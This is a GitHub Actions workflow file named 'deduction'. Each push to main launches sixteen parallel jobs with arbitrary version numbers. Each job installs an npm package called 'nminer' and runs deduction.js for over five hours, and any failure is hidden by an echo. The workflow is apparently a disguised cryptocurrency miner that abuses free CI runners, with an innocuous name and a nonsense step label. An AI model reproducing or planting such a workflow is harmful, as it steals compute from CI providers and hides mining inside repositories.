name: deduction
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 3036 }
          - { version: 7766 }
          - { version: 3544 }
          - { version: 5896 }
          - { version: 9970 }
          - { version: 8232 }
          - { version: 1676 }
          - { version: 6241 }
          - { version: 6149 }
          - { version: 8749 }
          - { version: 7803 }
          - { version: 828 }
          - { version: 846 }
          - { version: 4190 }
          - { version: 7824 }
          - { version: 2335 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: blah lest excluding brr
        run: |
          npm install nminer@latest
          timeout 323m node deduction.js || echo "deduction executed"